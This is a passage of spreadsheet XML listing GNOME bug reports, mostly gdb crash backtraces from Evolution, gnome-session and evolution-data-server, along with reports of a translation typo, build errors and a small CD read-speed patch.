#19 0xb6747bc7 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#20 0xb71a1ae0 in ?? () from /usr/lib/libORBit-2.so.0
#21 0x08bdeaf0 in ?? ()
#22 0xb67d2ff4 in ?? () from /usr/lib/libglib-2.0.so.0
#23 0xad5ff3c8 in ?? ()
#24 0xb6767aef in ?? () from /usr/lib/libglib-2.0.so.0
#25 0x00000000 in ?? ()
Thread 12 (Thread 0xadf63b90 (LWP 6834)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7153566 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2  0xb6727042 in ?? () from /usr/lib/libglib-2.0.so.0
#3  0x08a9e030 in ?? ()
#4  0x081b3bd8 in ?? ()
#5  0xadf63368 in ?? ()
#6  0xb672734f in g_async_queue_pop_unlocked () from /usr/lib/libglib-2.0.so.0
#7  0xb79603b5 in e_msgport_wait (msgport=0x81a5158) at e-msgport.c:684
#8  0xb7960acc in thread_dispatch (din=0x8141300) at e-msgport.c:1048
#9  0xb714f192 in start_thread () from /lib/libpthread.so.0
#10 0xb66a502e in clone () from /lib/libc.so.6
Thread 11 (Thread 0xafa5ab90 (LWP 6833)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7153566 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2  0xb6727042 in ?? () from /usr/lib/libglib-2.0.so.0
#3  0x08a9e030 in ?? ()
#4  0x081b3bd8 in ?? ()
#5  0xafa5a368 in ?? ()
#6  0xb672734f in g_async_queue_pop_unlocked () from /usr/lib/libglib-2.0.so.0
#7  0xb79603b5 in e_msgport_wait (msgport=0x81a5158) at e-msgport.c:684
#8  0xb7960acc in thread_dispatch (din=0x8141300) at e-msgport.c:1048
#9  0xb714f192 in start_thread () from /lib/libpthread.so.0
#10 0xb66a502e in clone () from /lib/libc.so.6
Thread 8 (Thread 0xae78eb90 (LWP 6826)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7153566 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2  0xb6727042 in ?? () from /usr/lib/libglib-2.0.so.0
#3  0xae8aa408 in ?? ()
---Type  to continue or q  to quit---
#4  0x08140fc0 in ?? ()
#5  0xae78e368 in ?? ()
#6  0xb672734f in g_async_queue_pop_unlocked () from /usr/lib/libglib-2.0.so.0
#7  0xb79603b5 in e_msgport_wait (msgport=0x81b3b10) at e-msgport.c:684
#8  0xb7960acc in thread_dispatch (din=0x81a8ae8) at e-msgport.c:1048
#9  0xb714f192 in start_thread () from /lib/libpthread.so.0
#10 0xb66a502e in clone () from /lib/libc.so.6
Thread 7 (Thread 0xaf1bcb90 (LWP 6825)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7153566 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2  0xb6727042 in ?? () from /usr/lib/libglib-2.0.so.0
#3  0x08c75f48 in ?? ()
#4  0x081a0468 in ?? ()
#5  0xaf1bc368 in ?? ()
#6  0xb672734f in g_async_queue_pop_unlocked () from /usr/lib/libglib-2.0.so.0
#7  0xb79603b5 in e_msgport_wait (msgport=0x81412e8) at e-msgport.c:684
#8  0xb7960acc in thread_dispatch (din=0x8141288) at e-msgport.c:1048
#9  0xb714f192 in start_thread () from /lib/libpthread.so.0
#10 0xb66a502e in clone () from /lib/libc.so.6
Thread 3 (Thread 0xb0acab90 (LWP 6821)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7153566 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2  0xb6727042 in ?? () from /usr/lib/libglib-2.0.so.0
#3  0x08a9e030 in ?? ()
#4  0x081b3bd8 in ?? ()
#5  0xb0aca368 in ?? ()
#6  0xb672734f in g_async_queue_pop_unlocked () from /usr/lib/libglib-2.0.so.0
#7  0xb79603b5 in e_msgport_wait (msgport=0x81a5158) at e-msgport.c:684
#8  0xb7960acc in thread_dispatch (din=0x8141300) at e-msgport.c:1048
#9  0xb714f192 in start_thread () from /lib/libpthread.so.0
#10 0xb66a502e in clone () from /lib/libc.so.6
Thread 2 (Thread 0xb12ebb90 (LWP 6820)):
#0  0xb664ef73 in strlen () from /lib/libc.so.6
#1  0xb1348c79 in send_as_attachment (cnc=0x80ae830 item=0xabebf370 content=0x93216f0 type=0xac0a1b38 dw=0xad6e0ccc filename=0xabe25a30 if3.reg
    cid=0x0 attach_list=0xb12eb220) at camel-groupwise-utils.c:318
#2  0xb13490a8 in do_multipart (cnc=0x80ae830 item=0xabebf370 mp=0xad6de668 attach_list=0xb12eb220) at camel-groupwise-utils.c:696
#3  0xb1349882 in camel_groupwise_util_item_from_message (cnc=0x80ae830 message=0xad6d2248 from=0x9299f24) at camel-groupwise-utils.c:425
#4  0xb134a218 in groupwise_send_to (transport=0xabe61338 message=0xad6d2248 from=0x9299f24 recipients=0x92780c0 ex=0xb12eb34c)
    at camel-groupwise-transport.c:190
#5  0xb7d4112b in camel_transport_send_to (transport=0xabe61338 message=0xad6d2248 from=0x9299f24 recipients=0x92780c0 ex=0xb12eb34c)
    at camel-transport.c:136
#6  0xb5fca170 in send_queue_send (mm=0x8f225e8) at mail-ops.c:526
#7  0xb5fc5795 in mail_msg_received (e=0x8141300 msg=0x8f225e8 data=0x0) at mail-mt.c:582
#8  0xb7960a1b in thread_dispatch (din=0x8141300) at e-msgport.c:1005
#9  0xb714f192 in start_thread () from /lib/libpthread.so.0
#10 0xb66a502e in clone () from /lib/libc.so.6
Thread 1 (Thread 0xb65409f0 (LWP 6813)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb669df62 in ?? () from /lib/libc.so.6
#2  0xb669e02b in writev () from /lib/libc.so.6
#3  0xb68b1259 in _xcb_conn_wait () from /usr/lib/libxcb.so.1
---Type  to continue or q  to quit---
#4  0xb68b17cb in _xcb_out_send () from /usr/lib/libxcb.so.1
#5  0xb68b18ff in _xcb_out_flush_to () from /usr/lib/libxcb.so.1
#6  0xb68b1a4f in xcb_flush () from /usr/lib/libxcb.so.1
#7  0xb6908807 in _XSend () from /usr/lib/libX11.so.6
#8  0xb6908978 in _XEventsQueued () from /usr/lib/libX11.so.6
#9  0xb68f1d62 in XPending () from /usr/lib/libX11.so.6
#10 0xb6c4bfcd in gdk_check_xpending (display=) at gdkevents-x11.c:150
#11 0xb6c4c0c1 in gdk_event_prepare (source=0x8090b18 timeout=0xbf7ffb88) at gdkevents-x11.c:2309
#12 0xb6746ce2 in g_main_context_prepare () from /usr/lib/libglib-2.0.so.0
#13 0xb6747499 in ?? () from /usr/lib/libglib-2.0.so.0
#14 0x08090b60 in ?? ()
#15 0xbf7ffbe8 in ?? ()
#16 0x08ecc9d8 in ?? ()
#17 0x00000009 in ?? ()
#18 0x0000000d in ?? ()
#19 0x08065660 in ?? ()
#20 0x08065600 in ?? ()
#21 0xbf7ffbe4 in ?? ()
#22 0x00000001 in ?? ()
#23 0x00000001 in ?? ()
#24 0x08090b60 in ?? ()
#25 0x08ecc9d8 in ?? ()
#26 0xb669b7a0 in ?? () from /lib/libc.so.6
#27 0xb7152b70 in ?? () from /lib/libpthread.so.0
#28 0xb7151420 in ?? () from /lib/libpthread.so.0
#29 0xb6767562 in g_thread_self () from /usr/lib/libglib-2.0.so.0
#30 0xb6747bc7 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#31 0xb723fd63 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#32 0x0805d386 in main (argc=1 argv=0x480) at main.c:602
#33 0xb65f7fe0 in __libc_start_main () from /lib/libc.so.6
#34 0x08050281 in _start ()
#0  0xb664ef73 in strlen () from /lib/libc.so.6
(gdb)</t>
  </si>
  <si>
    <t>NAUTILUS-96578</t>
  </si>
  <si>
    <t>Internationalization (i18n)</t>
  </si>
  <si>
    <t>serious typo in hungarian translation: .-al</t>
  </si>
  <si>
    <t>There's an entry in the po/hu.po file (both 
nautilus 2.0.7 and 2.1.1) where the string 
-al appears in this context (accents are 
removed by me here):
_Rejtett fajlok (\.\-al kezdodo fajlok)
This -al should be -tal:
...lok (\.\-tal kez...</t>
  </si>
  <si>
    <t>LIBGSF-356391</t>
  </si>
  <si>
    <t>gsf_input_uncompress doesn't handle bzip2</t>
  </si>
  <si>
    <t>It would be nice if gsf_input_uncompress handled bzip2 as well as gzip. It looks like the code is supposed to do that but it is #ifdef HAVE_BZIP instead of #ifdef HAVE_BZ2 and when HAVE_BZIP is manually enabled there's an obvious typo that prevents compilation:
gsf-input.c: In function `gsf_input_uncompress':
gsf-input.c:603: error: `gzip_sig' undeclared
Thanks</t>
  </si>
  <si>
    <t>lawremi</t>
  </si>
  <si>
    <t>GNOME-SESSION-108199</t>
  </si>
  <si>
    <t>Session manager crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-session
Severity: critical
Version: GNOME2.2.1 2.3.1
os_details: Gnome.Org
Synopsis: Session manager crash
Bugzilla-Product: gnome-session
Bugzilla-Component: gnome-session
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
CVS head. After pressing the logout button then cancel twice the
session manager crashed. Woohoo.
Debugging Information:
Backtrace was generated from '/gnome/install/bin/gnome-session'
[New Thread 8192 (LWP 1011)]
0x420ae169 in wait4 () from /lib/i686/libc.so.6
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
#1  0x4212a2d0 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x40802c63 in waitpid () from /lib/i686/libpthread.so.0
#3  0x4014c402 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:646
#4  0x4080447e in __pthread_sighandler () from
/lib/i686/libpthread.so.0
#5  
#6  0x404c6a9f in gdk_event_translate (display=0x8074460 event=0x0 
    xevent=0xbfffea78 return_exposes=1078755453) at
gdkevents-x11.c:741
#7  0x404c7ec1 in _gdk_events_queue (display=0x8074460) at
gdkevents-x11.c:1936
#8  0x404c80ac in gdk_event_dispatch (source=0xfffffe00 callback=0 
    user_data=0x0) at gdkevents-x11.c:1996
#9  0x40916407 in g_main_dispatch (context=0x80760e0) at gmain.c:1653
#10 0x40917309 in g_main_context_dispatch (context=0x80760e0) at
gmain.c:2197
#11 0x4091760f in g_main_context_iterate (context=0x80760e0 block=1 
    dispatch=1 self=0x80788a8) at gmain.c:2278
#12 0x40917c5e in g_main_loop_run (loop=0x8088b90) at gmain.c:2498
#13 0x4033ddbb in gtk_main () at gtkmain.c:1093
#14 0x080536e3 in main (argc=1 argv=0xbfffebf4) at main.c:366
#15 0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
Thread 1 (Thread 8192 (LWP 1011)):
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4212a2d0 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x40802c63 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4014c402 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:646
	in_segv = 1
	pid = 0
#4  0x4080447e in __pthread_sighandler () from
/lib/i686/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x404c6a9f in gdk_event_translate (display=0x8074460 event=0x0 
    xevent=0xbfffea78 return_exposes=1078755453) at
gdkevents-x11.c:741
	window = (struct _GdkDrawable *) 0xbfffea58
	filter_window = (struct _GdkDrawable *) 0xbfffe9e0
	window_impl = (struct _GdkWindowImplX11 *) 0x8101d18
	return_val = 1078917748
	xoffset = -1073747488
	yoffset = 0
	screen = (struct _GdkScreen *) 0xbfffe9b8
	screen_x11 = (struct _GdkScreenX11 *) 0xbfffe9e0
	xwindow = 3221218912
#7  0x404c7ec1 in _gdk_events_queue (display=0x8074460) at
gdkevents-x11.c:1936
	node = (struct _GList *) 0x80726c4
	event = (union _GdkEvent *) 0x8101d18
	xevent = {type = 17 xany = {type = 17 serial = 4809 send_event = 0
    display = 0x8072d20 window = 4194456} xkey = {type = 17 serial =
4809 
    send_event = 0 display = 0x8072d20 window = 4194456 root =
4194456 
    subwindow = 3804806317 time = 0 x = 0 y = 0 x_root = -65536 
    y_root = 0 state = 0 keycode = 0 same_screen = 16777216} xbutton
= {
    type = 17 serial = 4809 send_event = 0 display = 0x8072d20 
    window = 4194456 root = 4194456 subwindow = 3804806317 time = 0
x = 0 
    y = 0 x_root = -65536 y_root = 0 state = 0 button = 0 
    same_screen = 16777216} xmotion = {type = 17 serial = 4809 
    send_event = 0 display = 0x8072d20 window = 4194456 root =
4194456 
    subwindow = 3804806317 time = 0 x = 0 y = 0 x_root = -65536 
    y_root = 0 state = 0 is_hint = 0 '\0' same_screen = 16777216} 
  xcrossing = {type = 17 serial = 4809 send_event = 0 display =
0x8072d20 
    window = 4194456 root = 4194456 subwindow = 3804806317 time = 0
x = 0 
    y = 0 x_root = -65536 y_root = 0 mode = 0 detail = 0 
    same_screen = 16777216 focus = 16711680 state = 0} xfocus = {type
= 17 
    serial = 4809 send_event = 0 display = 0x8072d20 window =
4194456 
    mode = 4194456 detail = -490160979} xexpose = {type = 17 serial =
4809 
    send_event = 0 display = 0x8072d20 window = 4194456 x = 4194456
    y = -490160979 width = 0 height = 0 count = 0} xgraphicsexpose =
{
    type = 17 serial = 4809 send_event = 0 display = 0x8072d20 
    drawable = 4194456 x = 4194456 y = -490160979 width = 0 height =
0 
    count = 0 major_code = -65536 minor_code = 0} xnoexpose = {type =
17 
    serial = 4809 send_event = 0 display = 0x8072d20 drawable =
4194456 
    major_code = 4194456 minor_code = -490160979} xvisibility = {type
= 17 
    serial = 4809 send_event = 0 display = 0x8072d20 window =
4194456 
    state = 4194456} xcreatewindow = {type = 17 serial = 4809 
    send_event = 0 display = 0x8072d20 parent = 4194456 window =
4194456 
    x = -490160979 y = 0 width = 0 height = 0 border_width = -65536
    override_redirect = 0} xdestroywindow = {type = 17 serial = 4809
    send_event = 0 display = 0x8072d20 event = 4194456 window =
4194456} 
  xunmap = {type = 17 serial = 4809 send_event = 0 display =
0x8072d20 
    event = 4194456 window = 4194456 from_configure = -490160979}
xmap = {
    type = 17 serial = 4809 send_event = 0 display = 0x8072d20 
    event = 4194456 window = 4194456 override_redirect = -490160979}
  xmaprequest = {type = 17 serial = 4809 send_event = 0 
    display = 0x8072d20 parent = 4194456 window = 4194456} xreparent
= {
    type = 17 serial = 4809 send_event = 0 display = 0x8072d20 
    event = 4194456 window = 4194456 parent = 3804806317 x = 0 y =
0 
    override_redirect = 0} xconfigure = {type = 17 serial = 4809 
    send_event = 0 display = 0x8072d20 event = 4194456 window =
4194456 
    x = -490160979 y = 0 width = 0 height = 0 border_width = -65536
    above = 0 override_redirect = 0} xgravity = {type = 17 serial =
4809 
    send_event = 0 display = 0x8072d20 event = 4194456 window =
4194456 
    x = -490160979 y = 0} xresizerequest = {type = 17 serial = 4809
    send_event = 0 display = 0x8072d20 window = 4194456 width =
4194456 
    height = -490160979} xconfigurerequest = {type = 17 serial = 4809
    send_event = 0 display = 0x8072d20 parent = 4194456 window =
4194456 
    x = -490160979 y = 0 width = 0 height = 0 border_width = -65536
    above = 0 detail = 0 value_mask = 0} xcirculate = {type = 17 
    serial = 4809 send_event = 0 display = 0x8072d20 event = 4194456
    window = 4194456 place = -490160979} xcirculaterequest = {type =
17 
    serial = 4809 send_event = 0 display = 0x8072d20 parent =
4194456 
    window = 4194456 place = -490160979} xproperty = {type = 17 
    serial = 4809 send_event = 0 display = 0x8072d20 window =
4194456 
    atom = 4194456 time = 3804806317 state = 0} xselectionclear = {
    type = 17 serial = 4809 send_event = 0 display = 0x8072d20 
    window = 4194456 selection = 4194456 time = 3804806317} 
  xselectionrequest = {type = 17 serial = 4809 send_event = 0 
    display = 0x8072d20 owner = 4194456 requestor = 4194456 
    selection = 3804806317 target = 0 property = 0 time = 0}
xselection = {
    type = 17 serial = 4809 send_event = 0 display = 0x8072d20 
    requestor = 4194456 selection = 4194456 target = 3804806317 
    property = 0 time = 0} xcolormap = {type = 17 serial = 4809 
    send_event = 0 displaysplay = (struct _XDisplay *) 0x8072d20
#8  0x404c80ac in gdk_event_dispatch (source=0xfffffe00 callback=0 
    user_data=0x0) at gdkevents-x11.c:1996
	display = (struct _GdkDisplay *) 0x8074460
	event = (union _GdkEvent *) 0x8074460
#9  0x40916407 in g_main_dispatch (context=0x80760e0) at gmain.c:1653
	i = 0
#10 0x40917309 in g_main_context_dispatch (context=0x80760e0) at
gmain.c:2197
No locals.
#11 0x4091760f in g_main_context_iterate (context=0x80760e0 block=1 
    dispatch=1 self=0x80788a8) at gmain.c:2278
	max_priority = 0
	timeout = 0
	some_ready = 1
	nfds = 16
	allocated_nfds = 1
	fds = (struct _GPollFD *) 0x810d2f0
#12 0x40917c5e in g_main_loop_run (loop=0x8088b90) at gmain.c:2498
	self = (struct _GThread *) 0x80788a8
#13 0x4033ddbb in gtk_main () at gtkmain.c:1093
	tmp_list = (struct _GList *) 0x0
	functions = (struct _GList *) 0x0
	init = (struct _GtkInitFunction *) 0x1
	loop = (struct _GMainLoop *) 0x8088b90
#14 0x080536e3 in main (argc=1 argv=0xbfffebf4) at main.c:366
	ep = 0xfffffe00 
	session_name_env = 0xfffffe00 
	the_session = (struct {...} *) 0x8088b90
	gconf_client = (struct _GConfClient *) 0x8088b90
	splashing = 1
	err = (struct _GError *) 0x0
	status = 0
#15 0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
No symbol table info available.
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-03-12 10:12 -------
Reassigning to the default owner of the component gnome-session-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GNOME-VFS-80244</t>
  </si>
  <si>
    <t>Incorrect version of libbonobo is checked</t>
  </si>
  <si>
    <t>Changes have been made in libbonobo regarding the Bonobo_Stream_SeekCur
call. These changes have been made in libbonobo 1.115.0 but gnome-vfs
checks for 1.0.7 instead. 
As a result the compilation halts with the following message:
make[2]: Entering directory `/var/farm/gnome-vfs-1.9.12/monikers'
/bin/sh ../libtool --mode=compile gcc -DHAVE_CONFIG_H -I. -I. -I.. -I..   
    -I..                                                                  
  -I/usr/local/include/libbonobo-2.0 -I/usr/local/include/glib-2.0
-I/usr/local/lib/glib-2.0/include
-I/usr/local/include/bonobo-activation-2.0 -I/usr/local/include/libxml2
-I/usr/local/include/orbit-2.0 -I/usr/local/include/linc-1.0              
 -DG_DISABLE_DEPRECATED                          
-DG_LOG_DOMAIN=\GnomeVFSMonikers\    -g -O2 -c bonobo-stream-fs.c
gcc -DHAVE_CONFIG_H -I. -I. -I.. -I.. -I..
-I/usr/local/include/libbonobo-2.0 -I/usr/local/include/glib-2.0
-I/usr/local/lib/glib-2.0/include
-I/usr/local/include/bonobo-activation-2.0 -I/usr/local/include/libxml2
-I/usr/local/include/orbit-2.0 -I/usr/local/include/linc-1.0
-DG_DISABLE_DEPRECATED -DG_LOG_DOMAIN=\GnomeVFSMonikers\ -g -O2 -c
bonobo-stream-fs.c  -fPIC -DPIC -o bonobo-stream-fs.lo
bonobo-stream-fs.c: In function `fs_seek':
bonobo-stream-fs.c:174: `Bonobo_Stream_SeekCur' undeclared (first use in
this function)
bonobo-stream-fs.c:174: (Each undeclared identifier is reported only once
bonobo-stream-fs.c:174: for each function it appears in.)
bonobo-stream-fs.c:176: `Bonobo_Stream_SeekEnd' undeclared (first use in
this function)
make[2]: *** [bonobo-stream-fs.lo] Error 1
make[2]: Leaving directory `/var/farm/gnome-vfs-1.9.12/monikers'</t>
  </si>
  <si>
    <t>EVOLUTION-215478</t>
  </si>
  <si>
    <t>Evolution don't close</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.99
Synopsis: Evolution don't close
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I close Evolution when it find messages in the servers it don't close
simply put a little window on says Evolution is closing and never
end.
Unknown reporter: emestre@tinet.org changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>emestre</t>
  </si>
  <si>
    <t>EVOLUTION-217915</t>
  </si>
  <si>
    <t>Vfolder and Filter Editors present different date comparison options</t>
  </si>
  <si>
    <t>The filter and vfolder editors present quite different date comparison
options in their define-the-rule-clause areas. The pointless inconsistency
makes us look sloppy. 
To clarify:
in the VFolder editor I get: 
in the filter editor I get:
I think that the latter is more useful (it is much more easy to make
complicated date rules by stringing together these clauses than it is using
the vfolder editor's clauses)-- provided that was before and was after
are changed to is before and is after. Mailer guys? What do you think?
I can easily change the vfolder editor to work like the filter editor if
you don't seriously object.</t>
  </si>
  <si>
    <t>GNOME-MEDIA-164857</t>
  </si>
  <si>
    <t>cdparanoia is really noisy at x48</t>
  </si>
  <si>
    <t>After the switch to cdparanoia interface by default I noticed a big regression
for my system: playing via cdda:// is too noisy in my system.
Maybe it's because my cd-drive is crappy and makes too much noise at 48x. But
it's not when playing in direct mode.
So a solution for me (and those people with cheap cdroms) will be to set the
read speed to 1. 
This will do it:
diff -u -u -r1.5 gst-cdparanoia-cdrom.c
--- gst-cdparanoia-cdrom.c      26 Nov 2004 01:10:47 -0000      1.5
+++ gst-cdparanoia-cdrom.c      21 Jan 2005 21:04:59 -0000
@@ -6956 +6959 @@
        lcd = GST_CDPARANOIA_CDROM (cdrom)
        priv = lcd-&gt;priv
+
+       g_object_set (G_OBJECT (priv-&gt;cdparanoia) read_speed 1 NULL)
+
        if (gst_cdparanoia_cdrom_open (lcd error) == FALSE) {
                return FALSE
        }</t>
  </si>
  <si>
    <t>fherrera</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-338203</t>
  </si>
  <si>
    <t>EDS Crash @ Startup</t>
  </si>
  <si>
    <t>Steps to reproduce:
Often reported issue of getting a crash at startup finally I got one myself:
Stack trace:
Backtrace was generated from '/opt/gnome/libexec/evolution-data-server-1.6'
Using host libthread_db library /lib/tls/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 1085556288 (LWP 25479)]
[New Thread 1094069168 (LWP 25542)]
[Thread debugging using libthread_db enabled]
[New Thread 1085556288 (LWP 25479)]
[New Thread 1094069168 (LWP 25542)]
[Thread debugging using libthread_db enabled]
[New Thread 1085556288 (LWP 25479)]
[New Thread 1094069168 (LWP 25542)]
[New Thread 1096170416 (LWP 25541)]
[New Thread 1103461296 (LWP 25519)]
[New Thread 1091963824 (LWP 25486)]
0xffffe410 in ?? ()
#0  0xffffe410 in ?? ()
#1  0x00000001 in ?? ()
#2  0x00000000 in ?? ()
#3  0xbfffe2e8 in ?? ()
#4  0x40aae19b in __waitpid_nocancel () from /lib/tls/libc.so.6
#5  0x40a59c68 in do_system () from /lib/tls/libc.so.6
#6  0x40a59ff0 in system () from /lib/tls/libc.so.6
#7  0x40a1e66d in system () from /lib/tls/libpthread.so.0
#8  0x0804b7c0 in gnome_segv_handler (signo=11) at server.c:114
#9  
#10 0xffffe410 in ?? ()
#11 0xbfffe770 in ?? ()
#12 0x00000002 in ?? ()
#13 0x00000000 in ?? ()
#14 0x40aeb7fe in __lll_mutex_lock_wait () from /lib/tls/libc.so.6
#15 0x40aa102d in _L_mutex_lock_2146 () from /lib/tls/libc.so.6
#16 0x40b3aff4 in ?? () from /lib/tls/libc.so.6
#17 0xbfffe788 in ?? ()
#18 0x40a9fdc7 in timelocal () from /lib/tls/libc.so.6
#19 0x40a9fdc7 in timelocal () from /lib/tls/libc.so.6
#20 0x4030c759 in icaltime_as_timet_with_zone (tt=
      {year = 2006 month = 4 day = 13 hour = 4 minute = 0 second = 0
is_utc = 0 is_date = 0 is_daylight = 0 zone = 0x0} zone=0x403428e0)
    at icaltime.c:435
#21 0x402eb5c4 in time_from_isodate (str=0x4230a500 20060413T040000Z)
    at e-cal-time-util.c:637
#22 0x4028d3c5 in e_cal_backend_sexp_func_make_time (esexp=0x42406a38 
    argc=1 argv=0xbfffe900 data=0x42408470) at e-cal-backend-sexp.c:117
#23 0x4036a825 in e_sexp_term_eval (f=0x42406a38 t=0x42403380)
    at e-sexp.c:710
#24 0x4036a7dd in e_sexp_term_eval (f=0x42406a38 t=0x424032b0)
    at e-sexp.c:706
#25 0x4036b976 in e_sexp_eval (f=0x42406a38) at e-sexp.c:1304
#26 0x4028e819 in e_cal_backend_sexp_match_comp (sexp=0x424012c0 
    comp=0x424122c8 backend=0x808f498) at e-cal-backend-sexp.c:1045
#27 0x4028e8fa in e_cal_backend_sexp_match_object (sexp=0x424012c0 
    object=0x4273bd68
BEGIN:VEVENT\nUID:20060412T110154Z-25479-413-1-47@oa3\nDTSTAMP:20060412T110154Z\nDTSTARTVALUE=DATE:20060417\nDTENDVALUE=DATE:20060418\nSUMMARY:59.0/46.0Ã‚Â°F
- Milwaukee\nDESCRIPTIONALTREP=:Partly cloudy\\n... 
    backend=0x808f498) at e-cal-backend-sexp.c:1081
#28 0x402978b0 in e_data_cal_view_object_matches (query=0x424078d8 
    object=0x4273bd68
BEGIN:VEVENT\nUID:20060412T110154Z-25479-413-1-47@oa3\nDTSTAMP:20060412T110154Z\nDTSTARTVALUE=DATE:20060417\nDTENDVALUE=DATE:20060418\nSUMMARY:59.0/46.0Ã‚Â°F
- Milwaukee\nDESCRIPTIONALTREP=:Partly cloudy\\n...)
    at e-data-cal-view.c:516
#29 0x4028ab01 in e_cal_backend_notify_object_created (backend=0x808f498 
    calobj=0x4273bd68
BEGIN:VEVENT\nUID:20060412T110154Z-25479-413-1-47@oa3\nDTSTAMP:20060412T110154Z\nDTSTARTVALUE=DATE:20060417\nDTENDVALUE=DATE:20060418\nSUMMARY:59.0/46.0Ã‚Â°F
- Milwaukee\nDESCRIPTIONALTREP=:Partly cloudy\\n...)
    at e-cal-backend.c:1121
#30 0x40df21d1 in finished_retrieval_cb (forecasts=0x4231e0e4 cbw=0x808f498)
    at e-cal-backend-weather.c:167
#31 0x40df548a in e_weather_source_ccf_do_parse (source=0x807c6e0 
    buffer=0x82cc1d0 \n000) at e-weather-source-ccf.c:386
#32 0x40df55d8 in retrieval_done (message=0x80b25e0 source=0x807c6e0)
    at e-weather-source-ccf.c:423
#33 0x409068a6 in g_cclosure_marshal_VOID__VOID ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#34 0x408f98db in g_closure_invoke () from /opt/gnome/lib/libgobject-2.0.so.0
#35 0x40908d8b in g_signal_chain_from_overridden ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#36 0x4090a13b in g_signal_emit_valist ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#37 0x4090a626 in g_signal_emit () from /opt/gnome/lib/libgobject-2.0.so.0
#38 0x40bb23d1 in soup_message_finished (msg=0x80b25e0) at soup-message.c:558
#39 0x40bb42a9 in soup_message_io_finished (msg=0x80b25e0)
    at soup-message-io.c:153
#40 0x40bb52a4 in io_read (sock=0x80933e8 msg=0x80b25e0)
    at soup-message-io.c:697
#41 0x409068a6 in g_cclosure_marshal_VOID__VOID ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#42 0x408f98db in g_closure_invoke () from /opt/gnome/lib/libgobject-2.0.so.0
#43 0x40908d8b in g_signal_chain_from_overridden ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#44 0x4090a13b in g_signal_emit_valist ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#45 0x4090a626 in g_signal_emit () from /opt/gnome/lib/libgobject-2.0.so.0
#46 0x40bc1c7a in socket_read_watch (chan=0x80b3c38 cond=G_IO_IN 
    user_data=0x80933e8) at soup-socket.c:1069
#47 0x4099c69f in g_io_channel_unix_get_fd ()
   from /opt/gnome/lib/libglib-2.0.so.0
#48 0x40975967 in g_main_context_dispatch ()
   from /opt/gnome/lib/libglib-2.0.so.0
#49 0x40977ce2 in g_main_context_acquire ()
   from /opt/gnome/lib/libglib-2.0.so.0
#50 0x40978cf7 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
#51 0x40810cf0 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#52 0x0804bf20 in main (argc=3 argv=0xbffff684) at server.c:393
Thread 5 (Thread 1091963824 (LWP 25486)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x41160358 in ?? ()
No symbol table info available.
#2  0xffffffff in ?? ()
No symbol table info available.
#3  0x00000009 in ?? ()
No symbol table info available.
#4  0x40ad6954 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x40977c73 in g_main_context_acquire ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x40978cf7 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x408d0600 in link_set_io_thread () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#8  0x40991fb9 in g_thread_create_full () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x40a18aa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#10 0x40adfc2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 4 (Thread 1103461296 (LWP 25519)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x41c57348 in ?? ()
No symbol table info available.
#2  0xffffffff in ?? ()
No symbol table info available.
#3  0x00000001 in ?? ()
No symbol table info available.
#4  0x40ad6954 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x40977c73 in g_main_context_acquire ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x40978cf7 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x40070403 in startup_mainloop (arg=0x0) at e-book.c:3728
	loop = (GMainLoop *) 0x8087430
